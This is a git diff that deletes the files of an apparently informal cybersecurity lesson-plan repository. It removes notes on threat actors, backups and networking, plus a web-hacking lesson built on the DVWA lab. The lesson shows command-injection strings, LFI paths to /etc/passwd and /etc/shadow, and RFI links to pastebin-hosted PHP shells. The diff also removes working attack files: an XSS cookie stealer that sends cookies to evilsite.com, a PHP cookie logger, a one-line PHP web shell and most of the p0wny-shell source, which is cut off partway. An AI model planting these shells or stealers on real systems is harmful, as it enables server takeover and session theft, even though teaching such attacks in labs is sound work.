Compare commits
1 Commits
main
..
9f1a4d73e5
| Author | SHA1 | Date | |
|---|---|---|---|
| 9f1a4d73e5 |
@@ -1,2 +0,0 @@
|
|||||||
# Auto detect text files and perform LF normalization
|
|
||||||
* text=auto
|
|
||||||
@@ -1,157 +0,0 @@
|
|||||||
Lesson 1: Theory
|
|
||||||
define "assessing threats and mitigating risk within means"
|
|
||||||
"assessing theats"
|
|
||||||
Threat actors "who is threatening my shit"
|
|
||||||
Script kiddies - hack for bragging rights, low sophistication
|
|
||||||
"a `hacker` who uses premade tools and exploits without understanding them"
|
|
||||||
Hacktivists - Political motive
|
|
||||||
higher sophistication
|
|
||||||
more motivated
|
|
||||||
far more targeted
|
|
||||||
Organized crime - profit motive
|
|
||||||
Even higher sophistication
|
|
||||||
Scams, spam, phishing, malware
|
|
||||||
"scanning the whole fuckin internet for known exploits"
|
|
||||||
APTs - Advanced Persistant Threats - nation-state actors
|
|
||||||
Highest level of sophistication
|
|
||||||
Highly funded, large groups, well Organized
|
|
||||||
Espionage motives - occasional profit motive
|
|
||||||
Tend to operate in social engineering or especially 0day exploits.
|
|
||||||
Super important: find out who your most likely threat actors are.
|
|
||||||
Assets
|
|
||||||
"what shit do I have that needs to be protected" / "attack surface"
|
|
||||||
computers, phones, apps, servers, etc
|
|
||||||
Human beings
|
|
||||||
Super important: inventory your assets
|
|
||||||
"risk"
|
|
||||||
Financial
|
|
||||||
Reputational / social
|
|
||||||
Political
|
|
||||||
Important: find out what the risk of being pwned is
|
|
||||||
"mitigating"
|
|
||||||
Important: what assets should we focus on protecting?
|
|
||||||
Important: how should we go about protecting them?
|
|
||||||
"means"
|
|
||||||
Money
|
|
||||||
Time
|
|
||||||
user compliance
|
|
||||||
GRC
|
|
||||||
Governance
|
|
||||||
Policies
|
|
||||||
Adminsistration
|
|
||||||
"structure"
|
|
||||||
Risk
|
|
||||||
above
|
|
||||||
Compliance
|
|
||||||
"what laws do we have to follow?"
|
|
||||||
CIA Triad
|
|
||||||
Confidentiality
|
|
||||||
keep secrets secret
|
|
||||||
Make sure the people who need access, have access, securely
|
|
||||||
Integrity
|
|
||||||
Make sure your data is intact, unmodified, uncorrupted, correct
|
|
||||||
Availabiltiy
|
|
||||||
"make sure what should be available remains available"
|
|
||||||
|
|
||||||
Blue Team
|
|
||||||
"on defence"
|
|
||||||
Red Team "informs blue team"
|
|
||||||
"white hack hackers"
|
|
||||||
Try to break blue team's shit
|
|
||||||
they exist to inform blue team.
|
|
||||||
Purple Team "red team and blue team work together"
|
|
||||||
best model (imo)
|
|
||||||
|
|
||||||
Inventory Threats
|
|
||||||
Make a list of shit that could go wrong, as complete as possible
|
|
||||||
organize by impact and likelyhood
|
|
||||||
|
|
||||||
Threat heatmap
|
|
||||||
a simple heatmap
|
|
||||||
likelyhood of an attack (per year) (1-100%)
|
|
||||||
VS
|
|
||||||
impact of an attack (1-100)
|
|
||||||
One corner is "high likelyhood, high impact"
|
|
||||||
focus resources at quadrent
|
|
||||||
Opposite corner is "low likelyhood, low impact"
|
|
||||||
monitor, keep an eye on it
|
|
||||||
|
|
||||||
Continuity of business / disaster response/recovery
|
|
||||||
"to keep shit up and running when shit goes wrong"
|
|
||||||
Important: make a frikkn plan
|
|
||||||
Include: timeframe for fixes and cost of fixes
|
|
||||||
Backups
|
|
||||||
FUCKING DO THEM TWO LOCAL ONE REMOTE MINIMUM
|
|
||||||
Types:
|
|
||||||
Incremental
|
|
||||||
only back up data that has changed
|
|
||||||
uses less disk space
|
|
||||||
can be used for recovering from file deletes, mistakes, etc where you want to roll back the data
|
|
||||||
often the slowest to fully recover from
|
|
||||||
Full
|
|
||||||
just a full, seperate copy of all your data
|
|
||||||
os image, whatever
|
|
||||||
the largest in terms of filesize
|
|
||||||
also the fastest to recover from
|
|
||||||
You need both!
|
|
||||||
Schedule
|
|
||||||
"how often should we do a full backup?"
|
|
||||||
"how long should we store old data?"
|
|
||||||
"how often do we update the redundant storage?"
|
|
||||||
|
|
||||||
Redundancy
|
|
||||||
"having more than one thing in case it breaks"
|
|
||||||
9s problem
|
|
||||||
99% uptime on a decent thing is kinda a given
|
|
||||||
99.9% uptime (one 9 of uptime)
|
|
||||||
backup servers
|
|
||||||
faster incident response
|
|
||||||
more redundancy and procedure
|
|
||||||
99.99% uptime (two 9s)
|
|
||||||
geographically seperated backup servers
|
|
||||||
content delivery network
|
|
||||||
backup equipment to work on it (workstations, etc)
|
|
||||||
99.999+% uptime (three 9s)
|
|
||||||
fuckikn insane google-tier shit
|
|
||||||
Important: define what level of redundancy you need and can afford
|
|
||||||
|
|
||||||
Cold site, warm site, hot site
|
|
||||||
"spaces, physical or digital, that you can fall back to"
|
|
||||||
Backup physical office space
|
|
||||||
Backup datacenter
|
|
||||||
A spare cloud hosting account with your images loaded
|
|
||||||
Cold site
|
|
||||||
a backup space that will take some real time to get running
|
|
||||||
Hot site
|
|
||||||
a site that is 100% functional and ready to switch to at any time
|
|
||||||
Warm site
|
|
||||||
somewhere in-between
|
|
||||||
Power (electrical generator, power bank)
|
|
||||||
Manpower
|
|
||||||
Hardware (backup workstations, etc)
|
|
||||||
Backups
|
|
||||||
Important: "what is so important that we will spend money and time to mitigate downtime?"
|
|
||||||
Security Team
|
|
||||||
CISO - Cheif Information Security Officer
|
|
||||||
Generally report to the Chief Information Officer (CIO) or the Cheif Technical Officer (CTO)
|
|
||||||
Imo: CISO should to the board/president
|
|
||||||
Policymakers - make policies and rules and shit
|
|
||||||
|
|
||||||
Administration level - managing shit day to day
|
|
||||||
|
|
||||||
SOC - Security Operations Center
|
|
||||||
SOCs are fuckin cool
|
|
||||||
SOC base-level employee is a "threat analyst"
|
|
||||||
Monitor the cyber security status of the comany
|
|
||||||
tools like Splunk aggregate logs and alerts and put them into big tables, graphs, charts, maps, etc
|
|
||||||
When soemthing happens, they escelate to incident resoponse (IR)
|
|
||||||
which could be elevated to the disaster recovery team (OneDrive)
|
|
||||||
|
|
||||||
Monitoring
|
|
||||||
aggregate logs, alerts, security involved actions, all in one place
|
|
||||||
Splunk or free option ELK Stack
|
|
||||||
Baselining
|
|
||||||
"finding out what `normal` looks like, and build alerts for deviations"
|
|
||||||
AI works super good for this as a STARTING POINT
|
|
||||||
|
|
||||||
Cyber security domains: https://taosecurity.blogspot.com/2017/03/cybersecurity-domains-mind-map.html
|
|
||||||
@@ -1,128 +0,0 @@
|
|||||||
== Networking ==
|
|
||||||
IPv4/IPv6
|
|
||||||
ipv4 127.0.0.1
|
|
||||||
ipv6 2001:db8:3c4d:15::1a2f:1a2b.
|
|
||||||
DNS
|
|
||||||
translates domain names into ip addressess
|
|
||||||
|
|
||||||
client server
|
|
||||||
CLIENT = YOU(r device)
|
|
||||||
web server in this case
|
|
||||||
client: "hey google give me x page" -> upload
|
|
||||||
google: "here I found it, go ahead and download this page" <- download
|
|
||||||
request -> reply
|
|
||||||
|
|
||||||
TCP/UDP
|
|
||||||
|
|
||||||
web pages
|
|
||||||
files. .html .php .aspx
|
|
||||||
request: /dogs.html -> server: here is dogs.html
|
|
||||||
request/reply/"everything is a file"
|
|
||||||
frontend/backend
|
|
||||||
|
|
||||||
get/post/etc
|
|
||||||
"hey google, search for ppony fanfics"
|
|
||||||
request: POST search=pony fanfics
|
|
||||||
|
|
||||||
frontend: is the stuff sent to your Browser
|
|
||||||
and the web pages you make requests to
|
|
||||||
(public, client-facing)
|
|
||||||
html/css/javascript
|
|
||||||
backend: web servers,
|
|
||||||
php, node,
|
|
||||||
database, actions, api
|
|
||||||
|
|
||||||
== Basic Web Hacking ==
|
|
||||||
DVWA
|
|
||||||
Web Browser:
|
|
||||||
* command injection
|
|
||||||
get the GET var (ip)
|
|
||||||
load that into a command (ping command)
|
|
||||||
execute
|
|
||||||
theory: execute("ping $ip");
|
|
||||||
$ip = 8.8.8.8
|
|
||||||
Theory execute("ping 8.8.8.8")
|
|
||||||
$ip = 8.8.8.8; ls
|
|
||||||
$ip = 8.8.8.8 && ls -lah && whoami && groups && id
|
|
||||||
$ip = 8.8.8.8 && echo "hello world" > file.txt
|
|
||||||
|
|
||||||
a few things to try:
|
|
||||||
; (stack commands)
|
|
||||||
&& (stacks commands)
|
|
||||||
` (executes commands on some systems)
|
|
||||||
echo "something" > file.php (make a file)
|
|
||||||
|
|
||||||
* LFI
|
|
||||||
Local File Inclusion
|
|
||||||
"web server loads a file from its own drive and shows it"
|
|
||||||
try making it read a sensitive file?
|
|
||||||
a few things to try:
|
|
||||||
/etc/shadow
|
|
||||||
/etc/passwd
|
|
||||||
../../../../../../../../etc/passwd
|
|
||||||
Leak sensitive files
|
|
||||||
Database files
|
|
||||||
* RFI upload
|
|
||||||
When web server downlaods and executes a remote file
|
|
||||||
like: /page.php?file=file1.php -> /page.php?file=https://pastebin.com/raw/jmtqDfWQ
|
|
||||||
(if you need multiple GET variables):
|
|
||||||
./page.php?file=https://pastebin.com/raw/jmtqDfWQ&somevar=1337
|
|
||||||
(append &variablename=value)
|
|
||||||
a few things to try:
|
|
||||||
PHP shell
|
|
||||||
p0wny-shell-FI-mod: https://pastebin.com/raw/jmtqDfWQ ( Source: https://github.com/flozz/p0wny-shell )
|
|
||||||
simple-php-shell: https://pastebin.com/raw/uxbKCBGg
|
|
||||||
Malware of any type
|
|
||||||
* Stored XSS
|
|
||||||
<script>
|
|
||||||
i=new Image();
|
|
||||||
i.src="http://evilsite.com/cookielogger.php?cookie="+document.cookie;
|
|
||||||
document.appendChild(i);
|
|
||||||
</script>
|
|
||||||
* Reflected XSS
|
|
||||||
like search pages, etc
|
|
||||||
uses GET variables in the URL usually
|
|
||||||
requires tricking a victem into clicking a malicious link
|
|
||||||
* Open HTTP Redirect
|
|
||||||
get variables usually
|
|
||||||
just let you redirect from a legitimate site to your own
|
|
||||||
usually requires getting a victim to click a malicious link
|
|
||||||
|
|
||||||
SQL Injection:
|
|
||||||
"modifying an SQL query to do something fun"
|
|
||||||
Lab: https://www.db-fiddle.com/f/mZ2ftcLLzZLbrEELn38hjQ/17
|
|
||||||
Theory: SELEC
|
|
||||||
$user = Delilah123
|
|
||||||
$password = ??
|
|
||||||
SELECT * FROM users WHERE username='$user' AND password='$password';
|
|
||||||
$password = '
|
|
||||||
SELECT * FROM users WHERE username='Delilah123' AND password=''';
|
|
||||||
ERROR!
|
|
||||||
$password = anythinghere' OR 1=1
|
|
||||||
SELECT * FROM users WHERE username='Delilah123' AND password='anythinghere' OR 1=1'
|
|
||||||
ERROR
|
|
||||||
> always true!
|
|
||||||
|
|
||||||
$password = anythinghere' OR 1=1 --
|
|
||||||
-- is an sql comment! (space at start and end)
|
|
||||||
SELECT * FROM users WHERE username='Delilah123' AND password='anythinghere' OR 1=1 -- '
|
|
||||||
EXECUTES AND MATCHES!
|
|
||||||
|
|
||||||
#Burp Suite:
|
|
||||||
#* Weak session IDs
|
|
||||||
#* Brute force
|
|
||||||
|
|
||||||
#Coding:
|
|
||||||
#* CSRF
|
|
||||||
#* XSS keylogger
|
|
||||||
#* Advanced XSS+CSRF payload
|
|
||||||
|
|
||||||
Links:
|
|
||||||
SQL Injection Lab (WIP): https://www.db-fiddle.com/f/mZ2ftcLLzZLbrEELn38hjQ/16
|
|
||||||
p0wny-shell-FI-mod: https://pastebin.com/raw/jmtqDfWQ ( Source: https://github.com/flozz/p0wny-shell )
|
|
||||||
simple-php-shell: https://pastebin.com/raw/uxbKCBGg
|
|
||||||
basic XSS cookie stealer: https://pastebin.com/raw/puftrh39
|
|
||||||
General payloads including XSS and SQL Injection: https://swisskyrepo.github.io/PayloadsAllTheThings/
|
|
||||||
General hacking: https://cheatsheet.haax.fr/
|
|
||||||
Pi Pico W Power Analysis Tool (WIP): https://github.com/PrincessPi3/PiPicoPATLFGGGGG
|
|
||||||
|
|
||||||
@@ -1,2 +1,2 @@
|
|||||||
# OpenCybersecLessonPlan
|
# OpenCybersecLessonPlan
|
||||||
Open Coursework for Cyber Security
|
|
||||||
|
|||||||
@@ -1,5 +0,0 @@
|
|||||||
<script>
|
|
||||||
i=new Image();
|
|
||||||
i.src="http://evilsite.com/cookielogger.php?cookie="+document.cookie;
|
|
||||||
document.appendChild(i);
|
|
||||||
</script>
|
|
||||||
@@ -1 +0,0 @@
|
|||||||
<?php file_put_contents("cookies.txt", $_GET['cookie'], FILE_APPEND); ?>
|
|
||||||
@@ -1 +0,0 @@
|
|||||||
<?php print(shell_exec($_GET['x']));die();?>
|
|
||||||
@@ -1,609 +0,0 @@
|
|||||||
<?php
|
|
||||||
// Source: https://github.com/flozz/p0wny-shell
|
|
||||||
|
|
||||||
$SHELL_CONFIG = array(
|
|
||||||
'username' => 'admin',
|
|
||||||
'hostname' => 'password',
|
|
||||||
);
|
|
||||||
|
|
||||||
function expandPath($path) {
|
|
||||||
if (preg_match("#^(~[a-zA-Z0-9_.-]*)(/.*)?$#", $path, $match)) {
|
|
||||||
exec("echo $match[1]", $stdout);
|
|
||||||
return $stdout[0] . $match[2];
|
|
||||||
}
|
|
||||||
return $path;
|
|
||||||
}
|
|
||||||
|
|
||||||
function allFunctionExist($list = array()) {
|
|
||||||
foreach ($list as $entry) {
|
|
||||||
if (!function_exists($entry)) {
|
|
||||||
return false;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return true;
|
|
||||||
}
|
|
||||||
|
|
||||||
function executeCommand($cmd) {
|
|
||||||
$output = '';
|
|
||||||
if (function_exists('exec')) {
|
|
||||||
exec($cmd, $output);
|
|
||||||
$output = implode("\n", $output);
|
|
||||||
} else if (function_exists('shell_exec')) {
|
|
||||||
$output = shell_exec($cmd);
|
|
||||||
} else if (allFunctionExist(array('system', 'ob_start', 'ob_get_contents', 'ob_end_clean'))) {
|
|
||||||
ob_start();
|
|
||||||
system($cmd);
|
|
||||||
$output = ob_get_contents();
|
|
||||||
ob_end_clean();
|
|
||||||
} else if (allFunctionExist(array('passthru', 'ob_start', 'ob_get_contents', 'ob_end_clean'))) {
|
|
||||||
ob_start();
|
|
||||||
passthru($cmd);
|
|
||||||
$output = ob_get_contents();
|
|
||||||
ob_end_clean();
|
|
||||||
} else if (allFunctionExist(array('popen', 'feof', 'fread', 'pclose'))) {
|
|
||||||
$handle = popen($cmd, 'r');
|
|
||||||
while (!feof($handle)) {
|
|
||||||
$output .= fread($handle, 4096);
|
|
||||||
}
|
|
||||||
pclose($handle);
|
|
||||||
} else if (allFunctionExist(array('proc_open', 'stream_get_contents', 'proc_close'))) {
|
|
||||||
$handle = proc_open($cmd, array(0 => array('pipe', 'r'), 1 => array('pipe', 'w')), $pipes);
|
|
||||||
$output = stream_get_contents($pipes[1]);
|
|
||||||
proc_close($handle);
|
|
||||||
}
|
|
||||||
return $output;
|
|
||||||
}
|
|
||||||
|
|
||||||
function isRunningWindows() {
|
|
||||||
return stripos(PHP_OS, "WIN") === 0;
|
|
||||||
}
|
|
||||||
|
|
||||||
function featureShell($cmd, $cwd) {
|
|
||||||
$stdout = "";
|
|
||||||
|
|
||||||
if (preg_match("/^\s*cd\s*(2>&1)?$/", $cmd)) {
|
|
||||||
chdir(expandPath("~"));
|
|
||||||
} elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) {
|
|
||||||
chdir($cwd);
|
|
||||||
preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
|
|
||||||
chdir(expandPath($match[1]));
|
|
||||||
} elseif (preg_match("/^\s*download\s+[^\s]+\s*(2>&1)?$/", $cmd)) {
|
|
||||||
chdir($cwd);
|
|
||||||
preg_match("/^\s*download\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
|
|
||||||
return featureDownload($match[1]);
|
|
||||||
} else {
|
|
||||||
chdir($cwd);
|
|
||||||
$stdout = executeCommand($cmd);
|
|
||||||
}
|
|
||||||
|
|
||||||
return array(
|
|
||||||
"stdout" => base64_encode($stdout),
|
|
||||||
"cwd" => base64_encode(getcwd())
|
|
||||||
);
|
|
||||||
}
|
|
||||||
|
|
||||||
function featurePwd() {
|
|
||||||
return array("cwd" => base64_encode(getcwd()));
|
|
||||||
}
|
|
||||||
|
|
||||||
function featureHint($fileName, $cwd, $type) {
|
|
||||||
chdir($cwd);
|
|
||||||
if ($type == 'cmd') {
|
|
||||||
$cmd = "compgen -c $fileName";
|
|
||||||
} else {
|
|
||||||
$cmd = "compgen -f $fileName";
|
|
||||||
}
|
|
||||||
$cmd = "/bin/bash -c \"$cmd\"";
|
|
||||||
$files = explode("\n", shell_exec($cmd));
|
|
||||||
foreach ($files as &$filename) {
|
|
||||||
$filename = base64_encode($filename);
|
|
||||||
}
|
|
||||||
return array(
|
|
||||||
'files' => $files,
|
|
||||||
);
|
|
||||||
}
|
|
||||||
|
|
||||||
function featureDownload($filePath) {
|
|
||||||
$file = @file_get_contents($filePath);
|
|
||||||
if ($file === FALSE) {
|
|
||||||
return array(
|
|
||||||
'stdout' => base64_encode('File not found / no read permission.'),
|
|
||||||
'cwd' => base64_encode(getcwd())
|
|
||||||
);
|
|
||||||
} else {
|
|
||||||
return array(
|
|
||||||
'name' => base64_encode(basename($filePath)),
|
|
||||||
'file' => base64_encode($file)
|
|
||||||
);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
function featureUpload($path, $file, $cwd) {
|
|
||||||
chdir($cwd);
|
|
||||||
$f = @fopen($path, 'wb');
|
|
||||||
if ($f === FALSE) {
|
|
||||||
return array(
|
|
||||||
'stdout' => base64_encode('Invalid path / no write permission.'),
|
|
||||||
'cwd' => base64_encode(getcwd())
|
|
||||||
);
|
|
||||||
} else {
|
|
||||||
fwrite($f, base64_decode($file));
|
|
||||||
fclose($f);
|
|
||||||
return array(
|
|
||||||
'stdout' => base64_encode('Done.'),
|
|
||||||
'cwd' => base64_encode(getcwd())
|
|
||||||
);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
function initShellConfig() {
|
|
||||||
global $SHELL_CONFIG;
|
|
||||||
|
|
||||||
if (isRunningWindows()) {
|
|
||||||
$username = getenv('USERNAME');
|
|
||||||
if ($username !== false) {
|
|
||||||
$SHELL_CONFIG['username'] = $username;
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
$pwuid = posix_getpwuid(posix_geteuid());
|
|
||||||
if ($pwuid !== false) {
|
|
||||||
$SHELL_CONFIG['username'] = $pwuid['name'];
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
$hostname = gethostname();
|
|
||||||
if ($hostname !== false) {
|
|
||||||
$SHELL_CONFIG['hostname'] = $hostname;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
if (isset($_GET["feature"])) {
|
|
||||||
|
|
||||||
$response = NULL;
|
|
||||||
|
|
||||||
switch ($_GET["feature"]) {
|
|
||||||
case "shell":
|
|
||||||
$cmd = $_POST['cmd'];
|
|
||||||
if (!preg_match('/2>/', $cmd)) {
|
|
||||||
$cmd .= ' 2>&1';
|
|
||||||
}
|
|
||||||
$response = featureShell($cmd, $_POST["cwd"]);
|
|
||||||
break;
|
|
||||||
case "pwd":
|
|
||||||
$response = featurePwd();
|
|
||||||
break;
|
|
||||||
case "hint":
|
|
||||||
$response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);
|
|
||||||
break;
|
|
||||||
case 'upload':
|
|
||||||
$response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);
|
|
||||||
}
|
|
||||||
|
|
||||||
header("Content-Type: application/json");
|
|
||||||
echo json_encode($response);
|
|
||||||
die();
|
|
||||||
} else {
|
|
||||||
initShellConfig();
|
|
||||||
}
|
|
||||||
|
|
||||||
?><!DOCTYPE html>
|
|
||||||
|
|
||||||
<html>
|
|
||||||
|
|
||||||
<head>
|
|
||||||
<meta charset="UTF-8" />
|
|
||||||
<title>p0wny@shell:~#</title>
|
|
||||||
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
|
|
||||||
<style>
|
|
||||||
html, body {
|
|
||||||
margin: 0;
|
|
||||||
padding: 0;
|
|
||||||
background: #333;
|
|
||||||
color: #eee;
|
|
||||||
font-family: monospace;
|
|
||||||
width: 100vw;
|
|
||||||
height: 100vh;
|
|
||||||
overflow: hidden;
|
|
||||||
}
|
|
||||||
|
|
||||||
*::-webkit-scrollbar-track {
|
|
||||||
border-radius: 8px;
|
|
||||||
background-color: #353535;
|
|
||||||
}
|
|
||||||
|
|
||||||
*::-webkit-scrollbar {
|
|
||||||
width: 8px;
|
|
||||||
height: 8px;
|
|
||||||
}
|
|
||||||
|
|
||||||
*::-webkit-scrollbar-thumb {
|
|
||||||
border-radius: 8px;
|
|
||||||
-webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);
|
|
||||||
background-color: #bcbcbc;
|
|
||||||
}
|
|
||||||
|
|
||||||
#shell {
|
|
||||||
background: #222;
|
|
||||||
box-shadow: 0 0 5px rgba(0, 0, 0, .3);
|
|
||||||
font-size: 10pt;
|
|
||||||
display: flex;
|
|
||||||
flex-direction: column;
|
|
||||||
align-items: stretch;
|
|
||||||
max-width: calc(100vw - 2 * var(--shell-margin));
|
|
||||||
max-height: calc(100vh - 2 * var(--shell-margin));
|
|
||||||
resize: both;
|
|
||||||
overflow: hidden;
|
|
||||||
width: 100%;
|
|
||||||
height: 100%;
|
|
||||||
margin: var(--shell-margin) auto;
|
|
||||||
}
|
|
||||||
|
|
||||||
#shell-content {
|
|
||||||
overflow: auto;
|
|
||||||
padding: 5px;
|
|
||||||
white-space: pre-wrap;
|
|
||||||
flex-grow: 1;
|
|
||||||
}
|
|
||||||
|
|
||||||
#shell-logo {
|
|
||||||
font-weight: bold;
|
|
||||||
color: #FF4180;
|
|
||||||
text-align: center;
|
|
||||||
}
|
|
||||||
|
|
||||||
:root {
|
|
||||||
--shell-margin: 25px;
|
|
||||||
}
|
|
||||||
|
|
||||||
@media (min-width: 1200px) {
|
|
||||||
:root {
|
|
||||||
--shell-margin: 50px !important;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
@media (max-width: 991px),
|
|
||||||
(max-height: 600px) {
|
|
||||||
#shell-logo {
|
|
||||||
font-size: 6px;
|
|
||||||
margin: -25px 0;
|
|
||||||
}
|
|
||||||
:root {
|
|
||||||
--shell-margin: 0 !important;
|
|
||||||
}
|
|
||||||
#shell {
|
|
||||||
resize: none;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
@media (max-width: 767px) {
|
|
||||||
#shell-input {
|
|
||||||
flex-direction: column;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
@media (max-width: 320px) {
|
|
||||||
#shell-logo {
|
|
||||||
font-size: 5px;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
.shell-prompt {
|
|
||||||
font-weight: bold;
|
|
||||||
color: #75DF0B;
|
|
||||||
}
|
|
||||||
|
|
||||||
.shell-prompt > span {
|
|
||||||
color: #1BC9E7;
|
|
||||||
}
|
|
||||||
|
|
||||||
#shell-input {
|
|
||||||
display: flex;
|
|
||||||
box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);
|
|
||||||
border-top: rgba(255, 255, 255, .05) solid 1px;
|
|
||||||
padding: 10px 0;
|
|
||||||
}
|
|
||||||
|
|
||||||
#shell-input > label {
|
|
||||||
flex-grow: 0;
|
|
||||||
display: block;
|
|
||||||
padding: 0 5px;
|
|
||||||
height: 30px;
|
|
||||||
line-height: 30px;
|
|
||||||
}
|
|
||||||
|
|
||||||
#shell-input #shell-cmd {
|
|
||||||
height: 30px;
|
|
||||||
line-height: 30px;
|
|
||||||
border: none;
|
|
||||||
background: transparent;
|
|
||||||
color: #eee;
|
|
||||||
font-family: monospace;
|
|
||||||
font-size: 10pt;
|
|
||||||
width: 100%;
|
|
||||||
align-self: center;
|
|
||||||
box-sizing: border-box;
|
|
||||||
}
|
|
||||||
|
|
||||||
#shell-input div {
|
|
||||||
flex-grow: 1;
|
|
||||||
align-items: stretch;
|
|
||||||
}
|
|
||||||
|
|
||||||
#shell-input input {
|
|
||||||
outline: none;
|
|
||||||
}
|
|
||||||
</style>
|
|
||||||
|
|
||||||
<script>
|
|
||||||
var SHELL_CONFIG = <?php echo json_encode($SHELL_CONFIG); ?>;
|
|
||||||
var CWD = null;
|
|
||||||
var commandHistory = [];
|
|
||||||
var historyPosition = 0;
|
|
||||||
var eShellCmdInput = null;
|
|
||||||
var eShellContent = null;
|
|
||||||
|
|
||||||
function _insertCommand(command) {
|
|
||||||
eShellContent.innerHTML += "\n\n";
|
|
||||||
eShellContent.innerHTML += '<span class=\"shell-prompt\">' + genPrompt(CWD) + '</span> ';
|
|
||||||
eShellContent.innerHTML += escapeHtml(command);
|
|
||||||
eShellContent.innerHTML += "\n";
|
|
||||||
eShellContent.scrollTop = eShellContent.scrollHeight;
|
|
||||||
}
|
|
||||||
|
|
||||||
function _insertStdout(stdout) {
|
|
||||||
eShellContent.innerHTML += escapeHtml(stdout);
|
|
||||||
eShellContent.scrollTop = eShellContent.scrollHeight;
|
|
||||||
}
|
|
||||||
|
|
||||||
function _defer(callback) {
|
|
||||||
setTimeout(callback, 0);
|
|
||||||
}
|
|
||||||
|
|
||||||
function featureShell(command) {
|
|
||||||
|
|
||||||
_insertCommand(command);
|
|
||||||
if (/^\s*upload\s+[^\s]+\s*$/.test(command)) {
|
|
||||||
featureUpload(command.match(/^\s*upload\s+([^\s]+)\s*$/)[1]);
|
|
||||||
} else if (/^\s*clear\s*$/.test(command)) {
|
|
||||||
// Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer
|
|
||||||
eShellContent.innerHTML = '';
|
|
||||||
} else {
|
|
||||||
makeRequest("&feature=shell", {cmd: command, cwd: CWD}, function (response) {
|
|
||||||
if (response.hasOwnProperty('file')) {
|
|
||||||
featureDownload(atob(response.name), response.file)
|
|
||||||
} else {
|
|
||||||
_insertStdout(atob(response.stdout));
|
|
||||||
updateCwd(atob(response.cwd));
|
|
||||||
}
|
|
||||||
});
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
function featureHint() {
|
|
||||||
if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete
|
|
||||||
|
|
||||||
function _requestCallback(data) {
|
|
||||||
if (data.files.length <= 1) return; // no completion
|
|
||||||
data.files = data.files.map(function(file){
|
|
||||||
return atob(file);
|
|
||||||
});
|
|
||||||
if (data.files.length === 2) {
|
|
||||||
if (type === 'cmd') {
|
|
||||||
eShellCmdInput.value = data.files[0];
|
|
||||||
} else {
|
|
||||||
var currentValue = eShellCmdInput.value;
|
|
||||||
eShellCmdInput.value = currentValue.replace(/([^\s]*)$/, data.files[0]);
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
_insertCommand(eShellCmdInput.value);
|
|
||||||
_insertStdout(data.files.join("\n"));
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
var currentCmd = eShellCmdInput.value.split(" ");
|
|
||||||
var type = (currentCmd.length === 1) ? "cmd" : "file";
|
|
||||||
var fileName = (type === "cmd") ? currentCmd[0] : currentCmd[currentCmd.length - 1];
|
|
||||||
|
|
||||||
makeRequest(
|
|
||||||
"&feature=hint",
|
|
||||||
{
|
|
||||||
filename: fileName,
|
|
||||||
cwd: CWD,
|
|
||||||
type: type
|
|
||||||
},
|
|
||||||
_requestCallback
|
|
||||||
);
|
|
||||||
|
|
||||||
}
|
|
||||||
|
|
||||||
function featureDownload(name, file) {
|
|
||||||
var element = document.createElement('a');
|
|
||||||
element.setAttribute('href', 'data:application/octet-stream;base64,' + file);
|
|
||||||
element.setAttribute('download', name);
|
|
||||||
element.style.display = 'none';
|
|
||||||
document.body.appendChild(element);
|
|
||||||
element.click();
|
|
||||||
document.body.removeChild(element);
|
|
||||||
_insertStdout('Done.');
|
|
||||||
}
|
|
||||||
|
|
||||||
function featureUpload(path) {
|
|
||||||
var element = document.createElement('input');
|
|
||||||
element.setAttribute('type', 'file');
|
|
||||||
element.style.display = 'none';
|
|
||||||
document.body.appendChild(element);
|
|
||||||
element.addEventListener('change', function () {
|
|
||||||
var promise = getBase64(element.files[0]);
|
|
||||||
promise.then(function (file) {
|
|
||||||
makeRequest('&feature=upload', {path: path, file: file, cwd: CWD}, function (response) {
|
|
||||||
_insertStdout(atob(response.stdout));
|
|
||||||
updateCwd(atob(response.cwd));
|
|
||||||
});
|
|
||||||
}, function () {
|
|
||||||
_insertStdout('An unknown client-side error occurred.');
|
|
||||||
});
|
|
||||||
});
|
|
||||||
element.click();
|
|
||||||
document.body.removeChild(element);
|
|
||||||
}
|
|
||||||
|
|
||||||
function getBase64(file, onLoadCallback) {
|
|
||||||
return new Promise(function(resolve, reject) {
|
|
||||||
var reader = new FileReader();
|
|
||||||
reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };
|
|
||||||
reader.onerror = reject;
|
|
||||||
reader.readAsDataURL(file);
|
|
||||||
});
|
|
||||||
}
|
|
||||||
|
|
||||||
function genPrompt(cwd) {
|
|
||||||
cwd = cwd || "~";
|
|
||||||
var shortCwd = cwd;
|
|
||||||
if (cwd.split("/").length > 3) {
|
|
||||||
var splittedCwd = cwd.split("/");
|
|
||||||
shortCwd = "…/" + splittedCwd[splittedCwd.length-2] + "/" + splittedCwd[splittedCwd.length-1];
|
|
||||||
}
|
|
||||||
return SHELL_CONFIG["username"] + "@" + SHELL_CONFIG["hostname"] + ":<span title=\"" + cwd + "\">" + shortCwd + "</span>#";
|
|
||||||
}
|
|
||||||
|
|
||||||
function updateCwd(cwd) {
|
|
||||||
if (cwd) {
|
|
||||||
CWD = cwd;
|
|
||||||
_updatePrompt();
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
